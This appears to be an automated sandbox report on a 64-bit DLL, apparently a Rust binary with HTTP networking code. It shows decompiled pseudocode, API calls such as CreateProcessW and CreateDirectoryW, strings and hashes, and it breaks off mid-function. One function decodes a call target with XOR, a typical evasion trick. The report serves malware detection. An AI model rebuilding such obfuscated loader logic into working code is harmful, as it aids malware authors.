0x7fef304eacc
0x7fef304eacf
0x7fef304eada
0x7fef304eae5
0x7fef304eaed
0x7fef304eaf2
0x7fef304eaf7
0x7fef304eafc
0x7fef304eb04
0x7fef304eb11
0x7fef304eb14
0x7fef304eb17
0x7fef304eb22
0x7fef304eb29
0x7fef304eb37
0x7fef304eb46
0x7fef304eb59
0x7fef304eb6a
0x7fef304eb75
0x7fef304eb80
0x7fef304eb91
0x7fef304eb9c
0x7fef304eba7
0x7fef304ebb3
0x7fef304ebc1
0x7fef304ebcd
0x7fef304ebdb
0x7fef304ebe7
0x7fef304ebf5
0x7fef304ec04
0x7fef304ec14
0x7fef304ec27
0x7fef304ec53

APIs

CreateProcessW.KERNEL32 ref: 000007FEF304EB17
SleepEx.KERNEL32 ref: 000007FEF304EB22
HeapFree.KERNEL32 ref: 000007FEF304EB37
HeapFree.KERNEL32 ref: 000007FEF304EB59
HeapFree.KERNEL32 ref: 000007FEF304EB80
HeapFree.KERNEL32 ref: 000007FEF304EBA7
HeapFree.KERNEL32 ref: 000007FEF304EBC1
HeapFree.KERNEL32 ref: 000007FEF304EBDB
HeapFree.KERNEL32 ref: 000007FEF304EBF5
HeapFree.KERNEL32 ref: 000007FEF304EC14
HeapFree.KERNEL32 ref: 000007FEF304EC35

Strings

accept-encodinggziprangeRequest deadline overflowed, xrefs: 000007FEF304E9CB
h, xrefs: 000007FEF304EACF

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$CreateProcessSleep
String ID: accept-encodinggziprangeRequest deadline overflowed$h
API String ID: 3269885446-4133808251
Opcode ID: 6de3b9a5c7807c4ef42ddbc7e50a64636afe70f4b282b4cbadec216ae6bde466
Instruction ID: 0252774fb3f18544197d80e935107e42802ad8172818114ec76ba0c1d68b7531
Opcode Fuzzy Hash: 6de3b9a5c7807c4ef42ddbc7e50a64636afe70f4b282b4cbadec216ae6bde466
Instruction Fuzzy Hash: 24D18076A09BC189E7A4CF15E8443AAB3E2FBC8784F448126DA8D43BA8DF3CD555D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B7E38 Relevance: 20.1, APIs: 4, Strings: 7, Instructions: 817
networkmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000007FE7FEF30B7E38(void* __rcx, void* __rdx, void* __r8, void* __r9) {
				char _v600;
				char _v840;
				char _v1000;
				void* _t21;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				long long* _t34;
				long long _t41;
				long long* _t47;
				long long _t48;
				long long _t49;
				void* _t56;

				_t56 = __rcx;
				_t24 =  *((intOrPtr*)(__rdx + 0x40));
				_t48 =  *((intOrPtr*)(__rdx + 0x28));
				if (_t49 == 0) goto 0xf30b7ec4;
				if ( *((intOrPtr*)(__rdx + 0x38)) - _t49 <= 0) goto 0xf30b7e77;
				_t28 =  *((char*)(_t48 + _t49)) - 0xbf;
				if (_t28 > 0) goto 0xf30b7e7d;
				goto 0xf30b8729;
				if (_t28 != 0) goto 0xf30b8729;
				if (_t24 == 5) goto 0xf30b7eaa;
				if (_t24 != 4) goto 0xf30b7ec4;
				if (E000007FE7FEF30F2860(_t22, _t48, "httphttpsfile. lib.rs\\src\\parser.rs", _t49) == 0) goto 0xf30b7f4d;
				goto 0xf30b7eb1;
				if (E000007FE7FEF30F2860(_t22, _t48, "httpsfile. lib.rs\\src\\parser.rs", _t49) == 0) goto 0xf30b7f4d;
				_t34 =  &_v1000;
				 *_t34 = _t48;
				 *((long long*)(_t34 + 8)) = _t49;
				_t41 =  &_v840;
				 *_t41 = _t34;
				 *((long long*)(_t41 + 8)) = 0x7fef3096a50;
				_t47 =  &_v600;
				 *_t47 = 0xf314c600;
				 *((long long*)(_t47 + 8)) = _t49;
				 *((long long*)(_t47 + 0x10)) = _t48;
				 *((long long*)(_t47 + 0x20)) = _t41;
				 *((long long*)(_t47 + 0x28)) = 1;
				_t21 = E000007FE7FEF3051840(__rcx, _t47);
				 *((intOrPtr*)(_t56 + 0x44)) = 2;
				 *((long long*)(_t56 + 0x70)) = _t48;
				 *((char*)(_t56 + 0x80)) = 1;
				 *((long long*)(_t56 + 0xc8)) = _t49;
				return _t21;
			}

0x7fef30b7e4b
0x7fef30b7e4e
0x7fef30b7e51
0x7fef30b7e58
0x7fef30b7e6a
0x7fef30b7e6c
0x7fef30b7e70
0x7fef30b7e72
0x7fef30b7e77
0x7fef30b7e80
0x7fef30b7e85
0x7fef30b7e9b
0x7fef30b7ea8
0x7fef30b7ebe
0x7fef30b7ec4
0x7fef30b7ecc
0x7fef30b7ecf
0x7fef30b7ed3
0x7fef30b7edb
0x7fef30b7ee5
0x7fef30b7ef0
0x7fef30b7ef8
0x7fef30b7f00
0x7fef30b7f06
0x7fef30b7f0a
0x7fef30b7f0e
0x7fef30b7f19
0x7fef30b7f1e
0x7fef30b7f26
0x7fef30b7f2a
0x7fef30b7f32
0x7fef30b7f4c

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 000007FEF30B8196
HeapFree.KERNEL32 ref: 000007FEF30B837A

Part of subcall function 000007FEF30A7EB8: HeapFree.KERNEL32 ref: 000007FEF30A7ED3
Part of subcall function 000007FEF30A7EB8: HeapFree.KERNEL32 ref: 000007FEF30A7EED

Part of subcall function 000007FEF30A3790: ioctlsocket.WS2_32 ref: 000007FEF30A37A5

recv.WS2_32 ref: 000007FEF30B861C
WSAGetLastError.WS2_32 ref: 000007FEF30B8627

Strings

testcan't perform non https request with https_only setunknown scheme , xrefs: 000007FEF30B7EA1, 000007FEF30B8700
called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30B8D46
assertion failed: mid <= self.len(), xrefs: 000007FEF30B8D75
set, xrefs: 000007FEF30B7FB6
httphttpsfile. lib.rs\src\parser.rs, xrefs: 000007FEF30B7E87, 000007FEF30B86E6
invariant failed: empty VecDeque in `recycle`, xrefs: 000007FEF30B8D60
invariant failed: key in recycle but not in lru, xrefs: 000007FEF30B8D0D

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$AcquireErrorExclusiveLastLockioctlsocketrecv
String ID: set$assertion failed: mid <= self.len()$called `Result::unwrap()` on an `Err` value$httphttpsfile. lib.rs\src\parser.rs$invariant failed: empty VecDeque in `recycle`$invariant failed: key in recycle but not in lru$testcan't perform non https request with https_only setunknown scheme
API String ID: 3962643333-1696698796
Opcode ID: a29a8734a85149bd9dea7a50912ecccef9e7d8623963f318f23538e7a7c91c8a
Instruction ID: 79cf7ffab23701f2e09652fb9a9b6d8ab3b31e415559014b60f38714315ca9a4
Opcode Fuzzy Hash: a29a8734a85149bd9dea7a50912ecccef9e7d8623963f318f23538e7a7c91c8a
Instruction Fuzzy Hash: B492B136A08BC589EBA18B15E4507EEB3A5FB89B84F444222DF8C43BA5DF3CD595D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304EC54 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 275
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E000007FE7FEF304EC54(void* __edi, intOrPtr* __rcx) {
				void* _t64;
				int _t70;
				void* _t73;
				signed int _t109;
				void* _t115;
				void* _t128;
				long long _t129;
				intOrPtr _t130;
				signed long long _t140;
				signed long long _t141;
				long long _t142;
				intOrPtr _t143;
				signed long long _t144;
				intOrPtr _t176;
				intOrPtr _t179;
				intOrPtr _t180;
				long long _t187;
				long long _t191;
				signed long long _t196;
				signed long long _t197;
				void* _t199;
				void* _t201;
				signed long long _t202;
				long long _t204;
				signed long long _t205;
				long long _t206;
				long long _t207;
				signed long long _t208;
				long long* _t210;
				void* _t212;
				signed long long _t218;
				void* _t221;
				signed long long _t237;

				_t210 = __rcx;
				_t187 =  *((intOrPtr*)(__rcx));
				_t201 = _t221 + 0x70;
				E000007FE7FEF3051C30(_t128, _t201, _t187,  *((intOrPtr*)(__rcx + 0x10)));
				if ( *((long long*)(_t201 + 0x10)) != 1) goto 0xf304eccb;
				if ( *((char*)( *((intOrPtr*)(_t221 + 0x70)))) != 0x30) goto 0xf304eccb;
				if ( *((long long*)(_t221 + 0x78)) == 0) goto 0xf304eca7;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t210 + 8)) == 0) goto 0xf304f090;
				HeapFree(??, ??, ??);
				goto 0xf304f07a;
				_t129 =  *((intOrPtr*)(_t210 + 0x10));
				_t202 = _t221 + 0x30;
				 *((long long*)(_t202 + 0x10)) = _t129;
				asm("movups xmm0, [esi]");
				asm("movaps [edi], xmm0");
				_t142 =  *0xf319c0d0; // 0xa
				E000007FE7FEF30694DF(0, _t129, _t142);
				 *((long long*)(_t202 + 0x18)) = _t129;
				 *((long long*)(_t202 + 0x20)) = _t187;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t202 + 0x28)) = _t142;
				 *((long long*)(_t221 + 0x20)) = 0;
				_t212 = _t221 + 0x88;
				r8d = 2;
				E000007FE7FEF3075B28();
				E000007FE7FEF3042B21(_t202);
				_t143 =  *((intOrPtr*)(_t212 + 0x10));
				E000007FE7FEF306239E(_t129, _t143);
				_t237 = _t202;
				E000007FE7FEF30F1E10();
				_t204 =  *0xf319c208; // 0x19
				if (_t143 == 0) goto 0xf304edbd;
				_t115 = _t204 -  *0xf319c200; // 0x20
				if (_t115 != 0) goto 0xf304ed99;
				_t191 = _t204;
				_t64 = E000007FE7FEF3043262(_t191);
				_t205 =  *0xf319c208; // 0x19
				_t130 =  *0xf319c1f8; // 0x339090
				 *((short*)(_t130 + _t205 * 2)) =  *(_t129 + _t212) & 0x000000ff;
				_t206 =  *0xf319c208; // 0x19
				_t207 = _t206 + 1;
				 *0xf319c208 = _t207;
				if (_t143 != _t212 + 1) goto 0xf304ed79;
				_t144 =  *0xf319c1f8; // 0x339090
				E000007FE7FEF30C6C2A(_t64, _t207);
				_t218 = _t221 + 0xa0;
				 *_t218 = _t130;
				 *((long long*)(_t218 + 8)) = _t191;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t218 + 0x10)) = _t207;
				_t208 = _t221 + 0x30;
				E000007FE7FEF30410D8(_t208, _t218);
				if ( *_t208 != 0) goto 0xf304f094;
				 *(_t221 + 0x68) = _t237;
				 *((long long*)(_t221 + 0x28)) =  *((intOrPtr*)(_t221 + 0x38));
				 *((long long*)(_t221 + 0x60)) =  *((intOrPtr*)(_t221 + 0x40));
				 *((long long*)(_t221 + 0x30)) = 0xf31013bb;
				asm("dec eax");
				asm("dec eax");
				r8d = 0x1b5d;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				r10b = 1;
				r9d =  *(_t208 + 0xf3103590) & 0x000000ff;
				r14d =  *((_t208 | 0x00000002) + 0xf3103590) & 0x000000ff;
				_t140 = _t208 | 0x00000003;
				r12d =  *(_t140 + 0xf3103590) & 0x000000ff;
				_t196 = (_t208 | 0x00000006) << 0x38;
				_t141 = _t140 << 0x20;
				 *(_t221 + _t208 + 0x30) = (_t144 << 0x00000008 | "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value" | 0xf319c1f8 << 0x00000010 | _t237 << 0x00000018 | _t141 | (_t208 | 0x00000005) << 0x00000028 | _t218 << 0x00000030 | _t196) ^  *(_t207 + _t207 +  *((intOrPtr*)(_t221 + 0x30)) + _t208);
				r10d = 0;
				if ((r10b & 0x00000001) != 0) goto 0xf304ee6c;
				E000007FE7FEF30694DF(0, _t141, (_t208 | 0x00000005) << 0x28);
				asm("movaps xmm0, [esp+0x30]");
				asm("movups [eax], xmm0");
				_t176 =  *0xf319ce70; // 0x77620000
				r8d = 0x10;
				_t197 = _t141;
				E000007FE7FEF304BE45(_t176, _t197, _t207 + _t207 +  *((intOrPtr*)(_t221 + 0x30)));
				_t70 = CreateDirectoryW(??, ??); // executed
				 *((long long*)(_t221 + 0x30)) = 0xf30ff327;
				_t179 =  *((intOrPtr*)(_t221 + 0x30));
				_t199 = (_t197 ^  *0xf319c338) + 0xdacf7ebd;
				asm("dec eax");
				r14d = _t70;
				_t109 = 0xeca2bc78 ^  *(_t179 + _t199 + 8);
				E000007FE7FEF30694DF(0, _t141, _t179);
				 *_t141 = 0x7f4bbe67 ^  *(_t179 + _t199);
				 *(_t141 + 8) = _t109;
				_t180 =  *0xf319ce70; // 0x77620000
				r8d = 0xc;
				E000007FE7FEF304BE45(_t180, _t141, _t207 + _t207 +  *((intOrPtr*)(_t221 + 0x30)));
				_t73 =  *_t141();
				bpl = r14d != 0;
				r14b = _t73 == 0xb7;
				if (_t199 == 0) goto 0xf304efe6;
				HeapFree(??, ??, ??);
				if (_t196 == 0) goto 0xf304effd;
				HeapFree(??, ??, ??);
				 *((short*)( *((intOrPtr*)(_t221 + 0x28)))) = 0;
				if ( *((long long*)(_t221 + 0x60)) == 0) goto 0xf304f01f;
				HeapFree(??, ??, ??);
				if ( *(_t221 + 0x68) == 0) goto 0xf304f039;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t221 + 0x90)) == 0) goto 0xf304f05b;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t221 + 0x78)) == 0) goto 0xf304f077;
				HeapFree(??, ??, ??);
				bpl = bpl | r14b;
				return _t109;
			}

0x7fef304ec67
0x7fef304ec6a
0x7fef304ec71
0x7fef304ec79
0x7fef304ec83
0x7fef304ec8e
0x7fef304ec96
0x7fef304eca1
0x7fef304ecac
0x7fef304ecc0
0x7fef304ecc6
0x7fef304eccb
0x7fef304eccf
0x7fef304ecd4
0x7fef304ecd8
0x7fef304ecdb
0x7fef304ece5
0x7fef304ecf1
0x7fef304ecf6
0x7fef304ecfa
0x7fef304ed07
0x7fef304ed0c
0x7fef304ed10
0x7fef304ed20
0x7fef304ed28
0x7fef304ed34
0x7fef304ed3c
0x7fef304ed44
0x7fef304ed4b
0x7fef304ed53
0x7fef304ed5f
0x7fef304ed64
0x7fef304ed6e
0x7fef304ed7e
0x7fef304ed85
0x7fef304ed8a
0x7fef304ed8d
0x7fef304ed92
0x7fef304ed99
0x7fef304eda0
0x7fef304eda4
0x7fef304edab
0x7fef304edae
0x7fef304edbb
0x7fef304edbd
0x7fef304edc7
0x7fef304edcc
0x7fef304edd4
0x7fef304edd8
0x7fef304ede6
0x7fef304edeb
0x7fef304edef
0x7fef304edfa
0x7fef304ee03
0x7fef304ee09
0x7fef304ee13
0x7fef304ee1d
0x7fef304ee29
0x7fef304ee46
0x7fef304ee4d
0x7fef304ee51
0x7fef304ee58
0x7fef304ee5b
0x7fef304ee60
0x7fef304ee6c
0x7fef304ee84
0x7fef304ee8c
0x7fef304ee90
0x7fef304eec5
0x7fef304eed4
0x7fef304eefa
0x7fef304ef08
0x7fef304ef0e
0x7fef304ef1b
0x7fef304ef26
0x7fef304ef2b
0x7fef304ef2e
0x7fef304ef35
0x7fef304ef3b
0x7fef304ef3e
0x7fef304ef4a
0x7fef304ef53
0x7fef304ef58
0x7fef304ef69
0x7fef304ef70
0x7fef304ef84
0x7fef304ef8c
0x7fef304ef97
0x7fef304efa2
0x7fef304efa5
0x7fef304efa8
0x7fef304efaf
0x7fef304efb8
0x7fef304efbd
0x7fef304efc2
0x7fef304efcb
0x7fef304efd2
0x7fef304efe0
0x7fef304efe9
0x7fef304eff7
0x7fef304f002
0x7fef304f00e
0x7fef304f019
0x7fef304f025
0x7fef304f033
0x7fef304f042
0x7fef304f055
0x7fef304f061
0x7fef304f071
0x7fef304f077
0x7fef304f08f

APIs

HeapFree.KERNEL32 ref: 000007FEF304ECA1
HeapFree.KERNEL32 ref: 000007FEF304ECC0
CreateDirectoryW.KERNELBASE ref: 000007FEF304EF4A
HeapFree.KERNEL32 ref: 000007FEF304EFE0
HeapFree.KERNEL32 ref: 000007FEF304EFF7
HeapFree.KERNEL32 ref: 000007FEF304F019
HeapFree.KERNEL32 ref: 000007FEF304F033
HeapFree.KERNEL32 ref: 000007FEF304F055
HeapFree.KERNEL32 ref: 000007FEF304F071

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304ED19

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$CreateDirectory
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 1084653134-1586615424
Opcode ID: d74f69f730b4bb08936ed0bf87ca98a07bc7a38384a996f4b9a2e57db60e8c38
Instruction ID: c34cc4d4293a9c09699b8669224b1b5dcfed97216da755bf28edd6e59f547b69
Opcode Fuzzy Hash: d74f69f730b4bb08936ed0bf87ca98a07bc7a38384a996f4b9a2e57db60e8c38
Instruction Fuzzy Hash: 82C19F76A09A8189FA908B26E9403B977E2F788BC4F448123DE8D07779DF3CE555E300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B111D Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 589
memorynetworkCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E000007FE7FEF30B111D(void* __edi, void* __esi, void* __esp, long long __rax, void* __rcx, void* __rdx, long long __r8) {
				long long _v64;
				void* _v76;
				void* _t16;
				intOrPtr* _t50;

				_v64 = __r8;
				if ( *((intOrPtr*)(__rdx + 0xc8)) != 2) goto 0xf30b11d2;
				_t50 =  *((intOrPtr*)(__rdx + 0x78));
				E000007FE7FEF305A520();
				if (__rax == 0) goto 0xf30b11fe;
				 *((long long*)(__rax)) = __r8;
				if ( *((intOrPtr*)(__rdx + 0x70)) == 0) goto 0xf30b11a4;
				 *_t50();
				if ( *((long long*)(_t50 + 8)) == 0) goto 0xf30b11a4;
				if ( *((long long*)(_t50 + 0x10)) - 0x11 < 0) goto 0xf30b1192;
				HeapFree(??, ??, ??);
				_t16 = memcpy(__edi, __esi, 0xe);
				 *((long long*)(__rcx + 0x70)) = __rax;
				 *((long long*)(__rcx + 0x78)) = 0xf314b448;
				 *((long long*)(__rcx + 0x80)) =  *((intOrPtr*)(__rdx + 0x80));
				 *((long long*)(__rcx + 0xc8)) = 2;
				goto 0xf30b11ed;
				r8d = 0xe8;
				E000007FE7FEF30F1E10();
				E000007FE7FEF3042AA1();
				return _t16;
			}

0x7fef30b1132
0x7fef30b113e
0x7fef30b114b
0x7fef30b1160
0x7fef30b1168
0x7fef30b1171
0x7fef30b1177
0x7fef30b117c
0x7fef30b1185
0x7fef30b118c
0x7fef30b119e
0x7fef30b11ac
0x7fef30b11af
0x7fef30b11ba
0x7fef30b11be
0x7fef30b11c5
0x7fef30b11d0
0x7fef30b11d2
0x7fef30b11de
0x7fef30b11e8
0x7fef30b11fd

APIs

Part of subcall function 000007FEF305A520: GetProcessHeap.KERNEL32(?,?,?,000007FEF3068FDD), ref: 000007FEF305A534

HeapFree.KERNEL32 ref: 000007FEF30B119E
getaddrinfo.WS2_32 ref: 000007FEF30B1638
WSAGetLastError.WS2_32 ref: 000007FEF30B1646
freeaddrinfo.WS2_32 ref: 000007FEF30B16BC

Strings

assertion failed: len as usize >= mem::size_of::<c::sockaddr_in>(), xrefs: 000007FEF30B19C5, 000007FEF30B1A00
assertion failed: len as usize >= mem::size_of::<c::sockaddr_in6>()library\std\src\sys_common\net.rs, xrefs: 000007FEF30B19DF, 000007FEF30B1A21

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcessfreeaddrinfogetaddrinfo
String ID: assertion failed: len as usize >= mem::size_of::<c::sockaddr_in6>()library\std\src\sys_common\net.rs$assertion failed: len as usize >= mem::size_of::<c::sockaddr_in>()
API String ID: 1744989812-3722512293
Opcode ID: e5ffac59add0cc7845fec0d4ab6325a6f5ffe59f0969adfdf8552b2b7b374897
Instruction ID: 2403bee6a8274b2fde2876b4d490bd54e0b00d0c42fb62e51f471d08ba04c94e
Opcode Fuzzy Hash: e5ffac59add0cc7845fec0d4ab6325a6f5ffe59f0969adfdf8552b2b7b374897
Instruction Fuzzy Hash: 52429F32A087918DF7A98F25D8543F963E2F749798F448126CE4D87BA9DB38E582D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B6ED4 Relevance: 8.1, APIs: 3, Strings: 2, Instructions: 637
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E000007FE7FEF30B6ED4() {
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t49;
				long long _t51;
				long long _t55;
				long long* _t56;
				long long _t59;
				long long _t68;
				long long* _t71;
				long long _t74;
				void* _t75;
				long long* _t77;
				void* _t78;
				void* _t79;
				void* _t83;

				asm("movaps [esp+0x360], xmm6");
				_t74 = _t68;
				_t77 = _t56;
				E000007FE7FEF30C47F5(_t68 + 0x28, _t79, _t83);
				if (_t49 == 0) goto 0xf30b7c20;
				 *((char*)(_t78 + 0x20)) = r8d;
				_t75 = _t78 + 0x180;
				E000007FE7FEF30B7E38(_t75, _t74, _t49, _t68); // executed
				_t55 =  *((intOrPtr*)(_t75 + 0xc8));
				asm("movups xmm0, [esi]");
				asm("movups xmm1, [esi+0x10]");
				asm("movups xmm2, [esi+0x20]");
				asm("movaps [esp+0x270], xmm0");
				asm("movaps [esp+0x280], xmm1");
				asm("movaps [esp+0x290], xmm2");
				 *((long long*)(_t78 + 0x2a0)) =  *((intOrPtr*)(_t75 + 0x30));
				r15b =  *(_t75 + 0x38);
				if (_t55 != 3) goto 0xf30b7034;
				_t51 =  *((intOrPtr*)(_t78 + 0x2a0));
				 *((long long*)(_t78 + 0xf0)) = _t51;
				asm("movaps xmm0, [esp+0x270]");
				asm("movaps xmm1, [esp+0x280]");
				asm("movaps xmm2, [esp+0x290]");
				asm("movaps [esp+0xe0], xmm2");
				asm("movaps [esp+0xd0], xmm1");
				asm("movaps [esp+0xc0], xmm0");
				_t59 = _t74;
				E000007FE7FEF30B8DB8(_t40, _t51, _t59,  *((intOrPtr*)(_t78 + 0xc0)),  *((intOrPtr*)(_t78 + 0xc8))); // executed
				if (_t51 == 0) goto 0xf30b70be;
				 *((long long*)(_t78 + 0x270)) = _t51;
				if ((r15b & 0x00000001) != 0) goto 0xf30b710e;
				_t71 = _t78 + 0x180;
				 *_t71 = _t59;
				 *((intOrPtr*)(_t71 + 0x44)) = 2;
				 *((long long*)(_t71 + 0x70)) = _t59;
				 *((char*)(_t71 + 0x80)) = 8;
				 *((long long*)(_t71 + 0xc8)) = 2;
				E000007FE7FEF30B111D(_t41, _t42, _t43, _t51, _t77 + 8, _t71, _t51);
				 *_t77 = 1;
				E000007FE7FEF30A7FF1();
				goto 0xf30b70ad;
				r8d = 0x8f;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t77 + 0xe8)) =  *((intOrPtr*)(_t78 + 0x260));
				asm("movups xmm0, [esi+0x97]");
				asm("movups [ebp+0xd8], xmm0");
				 *((long long*)(_t77 + 0x38)) =  *((intOrPtr*)(_t78 + 0x2a0));
				asm("movaps xmm0, [esp+0x270]");
				asm("movaps xmm1, [esp+0x280]");
				asm("movaps xmm2, [esp+0x290]");
				asm("movups [ebp+0x28], xmm2");
				asm("movups [ebp+0x18], xmm1");
				asm("movups [ebp+0x8], xmm0");
				 *(_t77 + 0x40) = r15b;
				 *((long long*)(_t77 + 0xd0)) = _t55;
				 *_t77 = 1;
				E000007FE7FEF30A7AF6();
				goto 0xf30b77c1;
				if ( *((intOrPtr*)(_t74 + 0x20)) + 0xfffffffd - 4 > 0) goto 0xf30b7192;
				goto __rcx;
			}

0x7fef30b6ee7
0x7fef30b6ef5
0x7fef30b6ef8
0x7fef30b6eff
0x7fef30b6f07
0x7fef30b6f10
0x7fef30b6f14
0x7fef30b6f25
0x7fef30b6f2a
0x7fef30b6f31
0x7fef30b6f34
0x7fef30b6f38
0x7fef30b6f3c
0x7fef30b6f44
0x7fef30b6f4c
0x7fef30b6f58
0x7fef30b6f60
0x7fef30b6f68
0x7fef30b6f6e
0x7fef30b6f76
0x7fef30b6f7e
0x7fef30b6f86
0x7fef30b6f8e
0x7fef30b6f96
0x7fef30b6f9e
0x7fef30b6fa6
0x7fef30b6fbe
0x7fef30b6fc7
0x7fef30b6fcf
0x7fef30b6fd5
0x7fef30b6fe1
0x7fef30b6fe9
0x7fef30b6ff1
0x7fef30b6ff4
0x7fef30b6ffb
0x7fef30b6fff
0x7fef30b7006
0x7fef30b7018
0x7fef30b701d
0x7fef30b702d
0x7fef30b7032
0x7fef30b7040
0x7fef30b7049
0x7fef30b7055
0x7fef30b705c
0x7fef30b7063
0x7fef30b7072
0x7fef30b7076
0x7fef30b707e
0x7fef30b7086
0x7fef30b708e
0x7fef30b7092
0x7fef30b7096
0x7fef30b709a
0x7fef30b709e
0x7fef30b70a5
0x7fef30b70b4
0x7fef30b70b9
0x7fef30b70ca
0x7fef30b70e2

Strings

assertion failed: header.len() <= CHUNK_HEADER_MAX_SIZE, xrefs: 000007FEF30B7C5B
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30B7C20, 000007FEF30B7D0A

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: assertion failed: header.len() <= CHUNK_HEADER_MAX_SIZE$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-26705869
Opcode ID: 4cbe0f72b269824e530baa84efff88f3af08df10e9796c1a4aabc99ab13d533f
Instruction ID: 465cd4e68b10c5c65a8ed9496e6f847c644a632a22ba1bd8bc61caeb61e7b9ee
Opcode Fuzzy Hash: 4cbe0f72b269824e530baa84efff88f3af08df10e9796c1a4aabc99ab13d533f
Instruction Fuzzy Hash: 1C626F36A09BC189EAA58B15E4543EEB3A1FB88B84F448126DF8D43B79DF3CE155D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304329C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 838
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF304329C() {
				long long _v80;
				long long _v88;
				signed long long _v96;
				long long _v128;
				long long _v136;
				void* _t21;
				signed long long _t25;
				long long _t29;
				intOrPtr* _t37;
				intOrPtr* _t40;

